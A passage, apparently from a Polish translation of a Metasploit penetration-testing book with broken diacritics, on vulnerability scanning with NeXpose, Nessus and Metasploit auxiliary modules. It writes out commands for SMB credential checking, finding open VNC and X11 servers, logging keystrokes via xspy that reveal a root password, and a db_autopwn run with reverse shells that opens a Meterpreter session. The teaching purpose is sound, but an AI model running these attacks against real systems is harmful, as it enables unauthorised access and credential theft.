Przy zaadowanej wtyczce NeXpose przyjrzyj si� poleceniom zaadowanymkonkretnie dla tego skanera luk w zabezpieczeniach. W tym celu wprowad�komend� help. Na górze listy powiniene� teraz zobaczy� szereg nowych pole-ce� przeznaczonych specjalnie do uruchamiania NeXpose.

msf > help

S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 75

Zanim uruchomisz swoje pierwsze skanowanie z poziomu msfconsole, mu-sisz po�czy� si� z instalacj� NeXpose. Wpisz polecenie nexpose_connect -h, abywy�wietli� informacje o sposobie nawi�zywania po�czenia. Dodaj swoj� nazw�u�ytkownika oraz haso i adres hosta. Zaakceptuj równie� ostrze�enie o certyfi-kacie SSL, dodaj�c argument ok na ko�cu wiersza:

msf > nexpose_connect -h[*] Usage:[*] nexpose_connect username:password@host[:port] <ssl-confirm>[*] -OR-[*] nexpose_connect username password host port <ssl-confirm>msf > nexpose_connect dookie:s3cr3t@192.168.1.206 ok[*] Connecting to NeXpose instance at 192.168.1.206:3780 with username �dookie...

Teraz, aby zainicjowa� skanowanie, wprowad� polecenie nexpose_scan i po-daj docelowy adres IP, tak jak zostao to pokazane poni�ej. W tym przykadzieskanujemy pojedynczy adres IP, ale mo�esz równie dobrze poda� jako argumentzakres hostów (192.168.1.1-254) lub podsie� w notacji CIDR (192.168.1.0/24).

msf > nexpose_scan 192.168.1.195[*] Scanning 1 addresses with template pentest-audit in sets of 32[*] Completed the scan of 1 addressesmsf >

Kiedy skanowanie NeXpose zostanie zako�czone, jego wyniki powinny zo-sta� zapisane w bazie danych, któr� utworzye� wcze�niej. Aby przejrze� te wy-niki, zastosuj polecenie db_hosts, tak jak pokazuje to kolejny listing. (W tymprzykadzie listing zosta skrócony poprzez zastosowanie filtrowania po kolum-nie adresu [ang. address]).

msf > db_hosts -c addressHosts=====address Svcs Vulns Workspace------- ---- ----- ---------192.168.1.195 8 7 defaultmsf >

Jak mo�esz zauwa�y�, NeXpose wykry 7 luk w zabezpieczeniach. Wpro-wad� polecenie db_vulns, aby wy�wietli� znalezione luki:

msf > db_vulns

76 R o z d z i a � 4

Chocia� to skanowanie wykryo znacznie mniej luk w zabezpieczeniach w sto-sunku do 268 znalezionych w poprzednim skanowaniu wykonanym poprzez in-terfejs WWW z podaniem po�wiadcze�, to i tak te informacje powinny by� wy-starczaj�ce do rozpocz�cia eksploatacji danego systemu.

Skanowanie za pomoc� aplikacji NessusSkaner luk w zabezpieczeniach Nessus, dostarczony przez Tenable Security(http://www.tenable.com/), jest jednym z najpopularniejszych. Wtyczka Nessusdo Metasploit umo�liwia Ci przeprowadzanie skanowania i pobieranie informacjize skanów Nessusa za pomoc� konsoli. Jednak w poni�szych przykadach b�dziemyimportowa� wyniki skanowania Nessusa niezale�nie. Korzystaj�c z Nessusa 4.4.1na licencji Home Feed1, uruchomimy skanowanie z po�wiadczeniami tego samegocelu, który wykorzystywali�my w poprzednich przykadach w tym rozdziale. Imwi�cej narz�dzi wykorzystasz do sprecyzowania przyszych ataków na wst�p-nych etapach testu penetracyjnego, tym lepiej.

Konfiguracja skanera NessusPo pobraniu i zainstalowaniu skanera Nessus otwórz przegl�dark� internetow�i wpisz w pasku adresowym https://<twój_adres_ip>:8834. Zaakceptuj certyfikati zaloguj si�, u�ywaj�c po�wiadcze�, które utworzye� w trakcie instalacji. Powinnowy�wietli� si� gówne okno aplikacji Nessus, pokazane na rysunku 4.11.

Rysunek 4.11. G�ówne okno skanera Nessus

1 Darmowa licencja dla u�ytkowników domowych — przyp. t�um.

S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 77

Po zalogowaniu wy�wietlana jest sekcja Reports (raporty), w której powinnaznajdowa� si� lista wszystkich poprzednio przeprowadzonych skanowa� lukw zabezpieczeniach. Na znajduj�cym si� na samej górze gównym pasku narz�dzidost�pne s� jeszcze zakadki: Scans (skanowania — su�y do tworzenia i prze-gl�dania zada� zwi�zanych ze skanowaniem), Policies (polityki — konfigurowa-nie ró�nych wtyczek stosowanych podczas skanowania) oraz Users (u�ytkownicy— dodawanie kont u�ytkowników do serwera Nessus).

Tworzenie polityki skanowania NessusaZanim rozpoczniesz skanowanie, musisz najpierw stworzy� polityk� skanowania(ang. scan policy) Nessusa. W zakadce Policies kliknij zielony przycisk Add, abyotworzy� okno konfiguracji polityki, pokazane na rysunku 4.12.

Rysunek 4.12. Okno konfiguracji polityki skanowania Nessusa

W tym oknie mo�esz zobaczy� wiele dost�pnych opcji. Wszystkie one zo-stay opisane w dokumentacji Nessusa.

1. Wpisz nazw� skanowania, tak jak pokazuje to rysunek 4.13. U�yta w naszymprzykadzie nazwa The_Works b�dzie okre�laa polityk� wykorzystywaniaprzez skaner Nessus wszystkich paszczyzn kontroli. Kliknij Next.

2. Podobnie jak w przeprowadzanym poprzednio skanowaniu za pomoc�aplikacji NeXpose, skonfigurujemy wykorzystanie po�wiadcze� (ang.credentials) logowania systemu Windows. Zapewni to bardziej kompletnyobraz luk w zabezpieczeniach, obecnych w docelowym systemie.Wpisz po�wiadczenia logowania systemu docelowego i kliknij Next.

78 R o z d z i a � 4

Rysunek 4.13. Zak�adka General — ogólna konfiguracja polityki

3. W zakadce Plugins (wtyczki) masz do wyboru szereg ró�nych wtyczekskanera Nessus dla systemów Windows, Linux, BSD i innych. Je�liprzykadowo wiesz, �e b�dziesz przeprowadza skanowanie jedyniesystemów Windows, to mo�esz dla pierwszego przebiegu skanowaniausun�� z listy wiele niepotrzebnych wtyczek. Dla celów naszego skanowaniawybierzemy wszystkie wtyczki, klikaj�c Enable All (na rysunku 4.14w lewym dolnym rogu). Teraz kliknij Next.

Rysunek 4.14. Zak�adka Plugins — wybór wtyczek Nessusa wykorzystywanychpodczas skanowania

S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 79

4. Ko�cowym etapem definiowania nowej polityki jest zakadka Preferences(preferencje). Mo�esz tutaj skonfigurowa� pomijanie skanowania urz�dze�wra�liwych, takich jak drukarki sieciowe, skonfigurowa� zapisywaniewyników do zewn�trznej bazy danych, poda� po�wiadczenia logowaniai wiele innych rzeczy. Kiedy zako�czysz konfigurowanie tej zakadki,kliknij Submit, aby zapisa� nowo utworzon� polityk�. Polityka ta powinnapojawi� si� na li�cie w zakadce Policies, tak jak pokazuje to rysunek 4.15.

Rysunek 4.15. Nowo dodana polityka skanera Nessus

Uruchamianie skanowania za pomoc� NessusaJe�li utworzye� ju� polityk� skanowania, mo�esz rozpocz�� konfiguracj� kon-kretnego skanowania. Wybierz zakadk� Scans i kliknij przycisk Add, abyotworzy� okno konfiguracji. Wi�ksza cz��� konfiguracji Nessusa zawarta jestw politykach skanowania, wi�c kiedy definiujesz skanowanie, to wprowadzaszjego nazw�, wybierasz odpowiedni� polityk� oraz okre�lasz cele. Pokazuje torysunek 4.16.

Rysunek 4.16. Konfigurowanie skanowania Nessusa

80 R o z d z i a � 4

W naszym przykadzie skanujemy tylko jednego hosta, ale mo�esz równiedobrze wprowadzi� zakres adresów IP w notacji CIDR lub te� zaadowa� plikzawieraj�cy adresy IP celów, które chcesz przeskanowa�. Kiedy zako�czyszkonfiguracj�, kliknij Launch Scan (uruchom skanowanie).

Raporty skanera NessusPo zako�czeniu skanowania nie b�dzie ono ju� widoczne w zakadce Scans, zato w zakadce Reports pojawi si� nowy wpis zawieraj�cy nazw� skanowania, jegostatus oraz ostatni� aktualizacj�. Zaznacz wybrany raport i kliknij Browse, abyotworzy� podsumowanie skanowania pokazuj�ce poziomy dotkliwo�ci znalezio-nych luk w zabezpieczeniach. Przedstawia to rysunek 4.17.

Rysunek 4.17. Podsumowanie raportu z naszego skanowania za pomoc� Nessusa

UWAGA Pami�taj, �e to skanowanie by�o przeprowadzone z podaniem po�wiadcze sys-temu Windows, wi�c Nessus znalaz� du�o wi�cej luk w zabezpieczeniach, ni�mia�oby to miejsce w przypadku anonimowego skanowania.

Importowanie wyników do Metasploit FrameworkZaimportujmy teraz wyniki naszego skanowania do Metasploit Framework.

1. Kliknij przycisk Download Report w zakadce Reports, aby zapisa� wynikina dysk twardy. Domy�lny format raportów skanera Nessus, czyli .nessus,mo�e by� przetwarzany przez Metasploit. Je�li wi�c zostaniesz poproszonyo wybór domy�lnego formatu, kliknij Submit, aby zatwierdzi�.

2. Zaaduj msfconsole, utwórz now� baz� danych za pomoc� poleceniadb_connect i zaimportuj plik wyników Nessusa, wpisuj�c poleceniedb_import z podaniem nazwy pliku raportu.

S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 81

msf > db_connect postgres:toor@127.0.0.1/msf3msf > db_import /tmp/nessus_report_Host_195.nessus[*] Importing 'Nessus XML (v2)' data[*] Importing host 192.168.1.195

3. Aby zweryfikowa�, czy przeskanowany host oraz dane dotycz�ce lukw zabezpieczeniach zostay zaimportowane poprawnie, zastosuj poleceniedb_hosts, tak jak pokazuje to kolejny listing. Listing ten powinien zawiera�zwi�ze informacje na temat adresu IP celu (kolumna address), liczbywykrytych usug (kolumna svcs) oraz liczby wykrytych przez skanerNessus luk w zabezpieczeniach (kolumna vulns).

msf > db_hosts -c address,svcs,vulns

Hosts=====address svcs vulns------- ---- -----192.168.1.195 18 345

4. Je�li chcesz uzyska� pen� list� zawieraj�c� dane dotycz�ce lukw zabezpieczeniach, zaimportowane do Metasploit, zastosuj poleceniedb_vulns bez podawania �adnych argumentów. Przedstawia to poni�szylisting.

msf > db_vulns[*] Time: Wed Mar 09 03:40:10 UTC 2011 Vuln: host=192.168.1.195name=NSS-10916 refs=OSVDB-755[*] Time: Wed Mar 09 03:40:10 UTC 2011 Vuln: host=192.168.1.195name=NSS-10915 refs=OSVDB-754[*] Time: Wed Mar 09 03:40:11 UTC 2011 Vuln: host=192.168.1.195name=NSS-10913 refs=OSVDB-752[*] Time: Wed Mar 09 03:40:12 UTC 2011 Vuln: host=192.168.1.195name=NSS-10114 refs=CVE-1999-0524,OSVDB-94,CWE-200[*] Time: Wed Mar 09 03:40:13 UTC 2011 Vuln: host=192.168.1.195name=NSS-11197 refs=CVE-2003-0001,BID-6535

Posiadanie dost�pu do tych referencji na ko�cowym etapie testu penetra-cyjnego mo�e by� bardzo pomocne w przygotowywaniu raportu dla klienta.

Skanowanie za pomoc� Nessusa z poziomu MetasploitJe�li nie masz ochoty porzuca� wygody korzystania z wiersza polece� na rzeczinterfejsu graficznego, to mo�esz skorzysta� w Metasploit z wtyczki NessusBridge (http://blog.zate.org/nessus-plugin-dev/) dostarczonej przez Zate. Wtyczka

82 R o z d z i a � 4

Nessus Bridge umo�liwia cakowit� kontrol� Nessusa z poziomu Metasploit,uruchamianie skanowania, interpretacj� wyników oraz uruchamianie ataków napodstawie luk w zabezpieczeniach wykrytych przez Nessusa.

1. Podobnie jak w poprzednich przykadach, usu� najpierw istniej�c� baz�danych za pomoc� polecenia db_destroy i utwórz now� baz�, stosuj�cpolecenie db_connect.

2. Zaaduj wtyczk� Nessus, wpisuj�c polecenie load nessus, tak jak zostaoto pokazane poni�ej.

msf > db_destroy postgres:toor@127.0.0.1/msf3[*] Warning: You will need to enter the password at the prompts belowPassword:

msf > db_connect postgres:toor@127.0.0.1/msf3msf > load nessus[*] Nessus Bridge for Metasploit 1.1[+] Type nessus_help for a command listing[+] Exploit Index - (/root/.msf3/nessus_index) - is valid.[*] Successfully loaded plugin: Nessus

3. Wpisuj�c polecenie nessus_help, uzyskasz list� wszystkich komendobsugiwanych przez t� wtyczk�. Nessus Bridge jest stale rozwijanyi aktualizowany, warto wi�c od czasu do czasu sprawdzi�, czy zostaydodane jakie� nowe funkcje.

4. Zanim rozpoczniesz skanowanie za pomoc� wtyczki Nessus Bridge,musisz najpierw uwierzytelni� si� na serwerze Nessusa za pomoc�polecenia nessus_connect. Przedstawia to poni�szy listing.

msf > nessus_connect dookie:s3cr3t@192.168.1.101:8834 ok[*] Connecting to https://192.168.1.101:8834/ as dookie[*] Authenticated

5. Podobnie jak w przypadku graficznego interfejsu Nessusa, skanowanienale�y zainicjowa� z wykorzystaniem zdefiniowanej polityki okre�lonejnumerem ID. Aby wy�wietli� list� dost�pnych na serwerze politykskanowania, zastosuj polecenie nessus_policy_list:

msf > nessus_policy_list[+] Nessus Policy List

ID Name Comments-- ---- ---------4 Internal Network Scan

S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 83

-3 Web App Tests-2 Prepare for PCI DSS audits-1 External Network Scan2 The_Works

6. Wybierz ID polityki, któr� chcesz zastosowa� do skanowania, i uruchomnowe skanowanie za pomoc� polecenia nessus_scan_new, podaj�c numerpolityki, nazw� skanowania oraz docelowy adres IP. Przedstawia toponi�szy listing.

msf > nessus_scan_new[*] Usage:

[*] nessus_scan_new <policy id> <scan name> <targets>[*] use nessus_policy_list to list all available policiesmsf > nessus_scan_new 2 bridge_scan 192.168.1.195[*] Creating scan from policy number 2, called "bridge_scan" and scanning �192.168.1.195[*] Scan started. uid is d2f1fc02-3b50-4e4e-ab8f- �38b0813dd96abaeab61f312aa81e

7. Podczas wykonywania skanowania mo�esz sprawdzi� jego statusza pomoc� polecenia nessus_scan_status. Je�li polecenie zwróci statusNo Scans Running (nie jest wykonywane �adne skanowanie), tak jakpokazuje to kolejny przykad, to skanowanie zostao zako�czone.

msf > nessus_scan_status[*] No Scans Running.

8. Po zako�czeniu skanowania mo�esz wy�wietli� list� dost�pnych raportówza pomoc� polecenia nessus_report_list. Znajd� ID raportu, który chceszzaimportowa�, a nast�pnie u�yj polecenia nessus_report_get, aby pobra�i automatycznie zaimportowa� wybrany raport do bazy danych Metasploit.

msf > nessus_report_list[+] Nessus Report List

ID Name Status Date-- ---- ------ ----074dc984-05f1-57b1-f0c9-2bb80ada82fd3758887a05631c1d Host_195 completed 19:43�Mar 08 2011d2f1fc02-3b50-4e4e-ab8f-38b0813dd96abaeab61f312aa81e bridge_scan completed 09:37�Mar 09 2011

84 R o z d z i a � 4

[*] You can:[*] Get a list of hosts from the report: nessus_report_hosts <report id>msf > nessus_report_get d2f1fc02-3b50-4e4e-ab8f-38b0813dd96abaeab61f312aa81e[*] importing d2f1fc02-3b50-4e4e-ab8f-38b0813dd96abaeab61f312aa81e[*] 192.168.1.195 Microsoft Windows XP Professional (English) Done![+] Done

9. Na koniec, podobnie jak w przypadku pozostaych funkcji importowaniaopisanych w tym rozdziale, mo�esz zastosowa� polecenie db_hosts, �ebyzweryfikowa�, czy dane dotycz�ce skanowania zostay poprawniezaimportowane:

msf > db_hosts -c address,svcs,vulns

Hosts=====address svcs vulns------- ---- -----192.168.1.195 18 345

Teraz, kiedy zapoznae� si� ju� ze zmienno�ci� wyników skanowania dwóchró�nych produktów, powiniene� lepiej zrozumie� sens stosowania wi�cej ni�jednego narz�dzia dla potrzeb skanowania luk w zabezpieczeniach. Wci�� jednakto od pentestera zale�y interpretacja wyników generowanych przez te zauto-matyzowane narz�dzia i przeksztacenie tych wyników w dane decyzyjne.

Wyspecjalizowane skanery lukw zabezpieczeniach

Chocia� na rynku dost�pnych jest wiele komercyjnych skanerów luk w zabez-pieczeniach, nie musisz si� do nich ogranicza�. Je�li chcesz wykona� skanowa-nie poprzez sie� w poszukiwaniu konkretnych luk w zabezpieczeniach, to mo-�esz skorzysta� z licznych moduów pomocniczych Metasploit.

Przedstawione poni�ej moduy Metasploit stanowi� tylko kilka przykadówspo�ród wielu u�ytecznych pomocniczych moduów skanowania za�czonychw tym frameworku. Wykorzystaj swoje laboratorium testowe do wypróbowaniai zbadania tak wielu z nich, jak to mo�liwe.

Potwierdzanie logowania SMBAby sprawdzi� poprawno�� kombinacji nazwy u�ytkownika i hasa, skorzystaj zeskanera SMB Login Check Scanner do po�czenia si� z wieloma hostami. Jakpewnie si� spodziewasz, takie skanowanie jest go�ne i zauwa�alne, a ka�da próbalogowania zostanie zapisana w dzienniku zdarze� ka�dej maszyny z systememWindows, która zostanie napotkana.

S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 85

Po wybraniu moduu smb_login za pomoc� polecenia use mo�esz zastosowa�polecenie show_options, aby sprawdzi� ustawienia, które znajduj� si� w kolumnieRequired. Metasploit pozwala zdefiniowa� kombinacj� nazwy u�ytkownika i hasa,poda� list� nazw u�ytkownika i hase lub te� zastosowa� obie te opcje jednocze�nie.W kolejnym przykadzie zdefiniowano niewielki zakres adresów IP dla opcjiRHOSTS oraz skonfigurowano sprawdzanie okre�lonej nazwy u�ytkownika i hasadla wszystkich adresów.

msf > use auxiliary/scanner/smb/smb_loginmsf auxiliary(smb_login) > show options

Module options: Name Current Setting Required Description ---- --------------- -------- ----------- PASS_FILE no File containing passwords, one per line RHOSTS yes The target address range or CIDR identifier RPORT 445 yes Set the SMB service port SMBDomain WORKGROUP no SMB Domain SMBPass password no SMB Password SMBUser Administrator no SMB Username THREADS 50 yes The number of concurrent threads USERPASS_FILE no File containing users and passwords separated �by space, one pair per line USER_FILE no File containing usernames, one per line

msf auxiliary(smb_login) > set RHOSTS 192.168.1.150-155RHOSTS => 192.168.1.170-192.168.1.175msf auxiliary(smb_login) > set SMBUser AdministratorSMBUser => Administratormsf auxiliary(smb_login) > set SMBPass s3cr3tSMBPass => s3cr3tmsf auxiliary(smb_login) > run[*] Starting host 192.168.1.154[*] Starting host 192.168.1.150[*] Starting host 192.168.1.152[*] Starting host 192.168.1.151[*] Starting host 192.168.1.153[*] Starting host 192.168.1.155

� [+] 192.168.1.155 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'[*] Scanned 4 of 6 hosts (066% complete)[*] Scanned 5 of 6 hosts (083% complete)[*] Scanned 6 of 6 hosts (100% complete)[*] Auxiliary module execution completedmsf auxiliary(smb_login) >

W punkcie � mo�esz zobaczy� skuteczne logowanie dla u�ytkownika Admi-nistrator z hasem s3cr3t. Poniewa� w wielu �rodowiskach korporacyjnych sta-cje robocze s� klonowane z jednego obrazu i wdra�ane w caej infrastrukturzeprzedsi�biorstwa, haso administratora mo�e równie� by� takie samo dla ka�dejz nich, co daje Ci dost�p do wszystkich stacji roboczych w danej sieci.

86 R o z d z i a � 4

Skanowanie w poszukiwaniu otwartego uwierzytelniania VNCSystem przekazywania obrazu zwany VNC (ang. virtual network computing)umo�liwia graficzny dost�p do zdalnych systemów w sposób zbli�ony do pulpituzdalnego Microsoftu. Instalacje VNC s� powszechnie stosowane w korporacjach,poniewa� zapewniaj� podgl�d interfejsu graficznego pulpitów serwera i stacjiroboczych. Cz�sto instaluje si� VNC na potrzeb� chwili, a pó�niej zapomina si�o tej instalacji, pozostawiaj�c j� bez aktualizacji, co tworzy powa�n� potencjaln�luk� w zabezpieczeniach. Wbudowany w Metasploit skaner VNC AuthenticationNone przeszukuje zakres adresów IP w poszukiwaniu serwerów VNC, które nieposiadaj� skonfigurowanego hasa (brak uwierzytelniania, czyli puste haso). Zazwy-czaj takie skanowanie nie przynosi �adnych efektów, jednak dobry pentester wy-korzystuje wszystkie mo�liwo�ci uzyskania dost�pu do systemu docelowego.

UWAGA Najnowsze serwery VNC nie dopuszczaj� stosowania pustych hase�. Dla celówtestowych powiniene� wykorzysta� starsz� wersj�, na przyk�ad RealVNC 4.1.1.

Skaner VNC, tak jak wi�kszo�� moduów pomocniczych Metasploit, jest atwydo skonfigurowania i uruchomienia. Jedyna wymagana konfiguracja dla vnc_none_authto podanie adresu IP lub zakresu adresów IP, które maj� by� przeskanowane. Po pro-stu wybierz dany modu, okre�l w razie potrzeby opcje RHOSTS oraz THREADS i uru-chom skanowanie, tak jak pokazuje to kolejny przykad.

msf > use auxiliary/scanner/vnc/vnc_none_authmsf auxiliary(vnc_none_auth) > show options

Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 5900 yes The target port THREADS 1 yes The number of concurrent threads

msf auxiliary(vnc_none_auth) > set RHOSTS 192.168.1.155RHOSTS => 192.168.1.155msf auxiliary(vnc_none_auth) > run

[*] 192.168.1.155:5900, VNC server protocol version : RFB 003.008[*] 192.168.1.155:5900, VNC server security types supported : None

� [*] 192.168.1.155:5900, VNC server security types includes None, free access![*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedmsf auxiliary(vnc_none_auth) >

Je�li b�dziesz mia szcz��cie i Metasploit znajdzie serwer VNC bez uwie-rzytelniania, taki jak ten w punkcie �, to mo�esz skorzysta� z narz�dzia vncviewersystemu Back|Track, aby po�czy� si� z docelow� maszyn� bez konieczno�cipodawania hasa. Pokazuje to rysunek 4.18.

S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 87

Rysunek 4.18. Zastosowanie narz�dzia vncviewer do po��czenia si� z VNCniewymagaj�cym uwierzytelniania

Je�li uwa�asz, �e skanowanie VNC mo�e by� strat� czasu i nigdy nie znaj-dziesz systemów z otwartymi serwerami VNC, to powiniene� przemy�le� tojeszcze raz. Podczas szeroko zakrojonego testu penetracyjnego obejmuj�cegotysi�ce systemów jeden z autorów zauwa�y system z otwartym serwerem VNC.

B�d�c zalogowanym do tego systemu i dokumentuj�c swoje odkrycie, autorzauwa�y w pewnym momencie aktywno�� w tym systemie. Dziao si� to noc�,a dany system nie powinien by� wtedy wykorzystywany przez �adnego upraw-nionego u�ytkownika. Cho� nie jest to z reguy uwa�ane za dobr� praktyk�, au-tor podszy si� pod innego nieuprawnionego u�ytkownika i zainicjowa rozmow�,wykorzystuj�c do tego celu aplikacj� Notatnik. Intruz nie by zbyt bystry i wyjawiautorowi, �e skanowa du�e grupy systemów pod k�tem otwartych serwerów VNC.Oto fragment tej rozmowy (zachowano pisowni� oryginaln�):

Autor: Jeste� teraz w USA czy poza krajem? Mam znajomych w danii.

Intruz: Wa�ciwie to jestem z Norwegii, hehe. Mam krewnych w Danii.

Autor: Uczestniczysz w jakich� forach? korzystaem z kilku ale ju� nie dziaaj�

Intruz: Przewa�nie w programistycznych, ale niewiele poza tym. Od dawnazajmujesz si� hakowaniem? Ile masz lat tak w ogóle? Ja mam 22.

Autor: Robi� to dla zabawy tak mniej wi�cej od roku. Chodz� jeszcze doszkoy, mam 16 lat. Po prostu szukaem jakiego� zaj�cia.

Intruz: Ja te� gównie robi� to dla zabawy i próbuj� si� sprawdzi�. Poza tymsam napisaem taki program „VNC finder”. Znalazem mnóstwo serwerów,ale tylko ten dostarczy mi nieco rozrywki

Autor: Nie�le. W czym go napisae�? Mo�na go sk�d� pobra�? Masz uchwyt pliku?

Intruz: Napisaem go w j�zyku, który nazywa si� PureBasic, ale nie jest jeszczegotowy do publikacji. U�ywam go tylko na wasne potrzeby. Ale w sumie mog�go udost�pni�. Mógbym gdzie� zamie�ci� kod, �eby� go sobie skompilowa.Je�li tylko znajdziesz jaki� kompilator PureBasica na stronach warezowych :P

Autor: Super. Mo�esz go wrzuci� przez irc na t� stron� pastebin. Tak mo�eszposta opublikowa�. Nie robiem wcze�niej nic w purebasic, tylko python i perl

Intruz: Poszukam tej strony pastebin i zaaduje go, daj mi kilka minut. Odezw� si�.

Intruz poda w ko�cu autorowi link do strony pastebin z penym kodem�ródowym skanera VNC, którego u�ywa.

88 R o z d z i a � 4

Skanowanie w poszukiwaniu otwartych serwerów X11Zintegrowany z Metasploit skaner open_x11 jest zbli�ony do skanera vnc_auth.Przeszukuje on zakres hostów w poszukiwaniu serwerów X11, które umo�li-wiaj� u�ytkownikom �czenie si� bez uwierzytelniania. Chocia� serwery X11 nies� ju� dzisiaj powszechnie wykorzystywane, to znajdzie si� wiele dziaaj�cycharchaicznych maszyn posiadaj�cych stare, niezaatane i zapomniane systemyoperacyjne. Jak moge� zauwa�y� w poprzednich dwóch przykadach, starszesystemy s� cz�sto najbardziej zagro�one w ka�dej sieci.

Aby uruchomi� skaner open_x11, musisz wykona� podobn� konfiguracj� jakw przypadku wi�kszo�ci pozostaych moduów pomocniczych, definiuj�c warto��RHOST oraz opcjonalnie THREADS. Kolejny przykad ilustruje sesj� tego skanera.Zwró� uwag�, �e skaner znalaz otwarty serwer X pod adresem IP 192.168.1.23.Jest to powa�na luka w zabezpieczeniach, poniewa� umo�liwia osobie przepro-wadzaj�cej atak uzyskanie nieuwierzytelnionego dost�pu do danego systemu:system X obsuguje interfejs graficzny wraz z myszk� i klawiatur�.

msf > use auxiliary/scanner/x11/open_x11msf auxiliary(open_x11) > show options

Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 6000 yes The target port THREADS 1 yes The number of concurrent threads

msf auxiliary(open_x11) > set RHOSTS 192.168.1.0/24RHOSTS => 192.168.1.0/24msf auxiliary(open_x11) > set THREADS 50THREADS => 50msf auxiliary(open_x11) > run[*] Trying 192.168.1.1[*] Trying 192.168.1.0[*] Trying 192.168.1.2...[*] Trying 192.168.1.29[*] Trying 192.168.1.30[*] Open X Server @ 192.168.1.23 (The XFree86 Project, Inc)[*] Trying 192.168.1.31[*] Trying 192.168.1.32

. . . fragment usuni�ty . . .

[*] Trying 192.168.1.253[*] Trying 192.168.1.254[*] Trying 192.168.1.255[*] Auxiliary module execution completed

S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 89

�eby zobaczy�, co osoba atakuj�ca mo�e zrobi� z tak� luk� w zabezpiecze-niach, uruchom rejestrowanie klawiatury, wykorzystuj�c narz�dzie xspy systemuBack|Track. Robi si� to w nast�puj�cy sposób:

root@bt:/# cd /pentest/sniffers/xspy/root@bt:/pentest/sniffers/xspy# ./xspy -display 192.168.1.23:0 -delay 100

ssh root@192.168.1.11(+BackSpace)37sup3rs3cr3tp4s5w0rdifconfigexit

Narz�dzie xspy dzi�ki zdalnemu podsuchiwaniu sesji klawiatury serwera Xumo�liwio przechwycenie u�ytkownika wykorzystuj�cego SSH do zalogowaniasi� jako root na zdalnym systemie. Tego typu luki w zabezpieczeniach mog� by�do�� rzadkie, jednak je�li ju� je odkryjesz, s� niezwykle cenne.

Wykorzystywanie wyników skanowaniado autopwningu

Przejd�my teraz na chwil� do eksploatacji. Narz�dzie Autopwn frameworkuMetasploit automatycznie namierza i eksploatuje system, wykorzystuj�c otwarteporty lub zaimportowane wyniki skanowania luk w zabezpieczeniach. Mo�eszzastosowa� Autopwn do wykorzystania wyników wi�kszo�ci skanerów luk w za-bezpieczeniach, takich jak NeXpose, Nessus czy OpenVAS.

Oto przykad wykorzystania zaimportowanych wyników Nessusa do namie-rzenia i automatycznego przej�cia (ang. autopwn) systemu. Utwórz now� baz�danych za pomoc� polecenia db_connect, a nast�pnie zaimportuj raport ze ska-nowania, stosuj�c polecenie db_import. W tym przykadzie uruchomimydb_autopwn z szeregiem prze�czników, aby przeprowadzi� ataki na wszystkiecele (e), pokaza� wszystkie pasuj�ce moduy (t), zastosowa� adunek reverseshell (r), wybra� moduy exploitów na podstawie luk w zabezpieczeniach (x)oraz na podstawie otwartych portów (p). Po uruchomieniu db_autopwn Meta-sploit rozpoczyna odpalanie exploitów do okre�lonych celów. Je�li dziaanieexploita przyniesie skutek, to zwracana jest powoka do maszyny atakuj�cej.

msf > db_connect postgres:toor@127.0.0.1/msf3msf > db_import /root/nessus.nbemsf > db_autopwn –e –t –r -x -p

� [*] (1/72 [0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin �against 192.168.33.130:1433...

90 R o z d z i a � 4

[*] (2/72 [0 sessions]): Launching exploit/windows/smb/psexec against �192.168.33.130:445...[*] (3/72 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against �192.168.33.130:445...

. . . fragment usuni�ty . . .

[*] Transmitting intermediate stager for over-sized stage...(216 bytes)[*] Sending stage (718336 bytes)

� [*] Meterpreter session 1 opened (192.168.1.101:40912 -> 192.168.1.115:15991)[*] (72/72 [1 sessions]): Waiting on 2 launched modules to finish execution...[*] (72/72 [1 sessions]): Waiting on 0 launched modules to finish execution...

Na podstawie tych skanowa� Autopwn odpali 72 exploity w punkcie �.Jeden z nich okaza si� skuteczny, co wida� w punkcie �. Exploit ten umo�liwiapeny dost�p do danej maszyny z wykorzystaniem konsoli Meterpretera, którazostanie bardziej szczegóowo omówiona w rozdziale 6.

UWAGA Istnieje jedno istotne ograniczenie, o którym powiniene� pami�ta�, stosuj�c na-rz�dzie Autopwn. Je�li przeprowadzasz zmasowany atak za pomoc� Autopwn, tosystem docelowy mo�e ulec awarii lub utraci� stabilno��. Autopwn posiada jed-nak kilka u�ytecznych funkcji, które nie zosta�y tutaj opisane. Nale�y do nichmo�liwo�� wyboru jedynie tych exploitów, które posiadaj� ranking „doskona�y”,co znacznie zmniejsza prawdopodobiestwo, �e spowoduj� one awari� zdalnegosystemu lub us�ugi. Aby uzyska� wi�cej informacji na temat wykorzystania tegonarz�dzia, u�yj polecenia db_autopwn –h.

Skorowidz

Aaccess point, 208administrator przedsi�biorstwa,

28adres zwrotny, return address,

255, 261adresy prywatne, 55aktualizacja systemu

Back|Track, 339algorytm Blowfish, 207analiza

luk w zabezpieczeniach, 27�ledcza, 327

anonimowe logowanie, 60aplet Javy, 187aplikacja

Ettercap, 223MailCarrier, 277NetWin SurgeMail, 251Quick TFTP, 287

aplikacje podatne na ataki, 336architektura CPU, 278armitage, 38asembler, 40, 272

atakbrute force, 113, 178client-side, 151, 163, 209,

222cross-site scripting, 196DNS, 45man-left-in-the-middle, 196mass mailingowy, 195na adres e-mail, 185na fikcyjn� stron�, 188na MS SQL Server, 113na serwer Apache Tomcat,

323na stert�, 106, 130pass-the-hash, 132r�czny, 316spear-phishing, 182�lepy, 219Web Jacking, 197wieloaspektowy, 199wstrzykni�cia zapytania, 29wykorzystuj�cy

aplet Javy, 181, 187, 203a�cuch zapytania, 211parametr POST, 212

przepenienie bufora, 250t�czowe tablice, 121

z pivotingiem, 130zatrucia ARP, 223zwi�kszaj�cy uprawnienia,

153zwracaj�cy b�dy, 219

atakiSET, 208socjotechniczne, 208
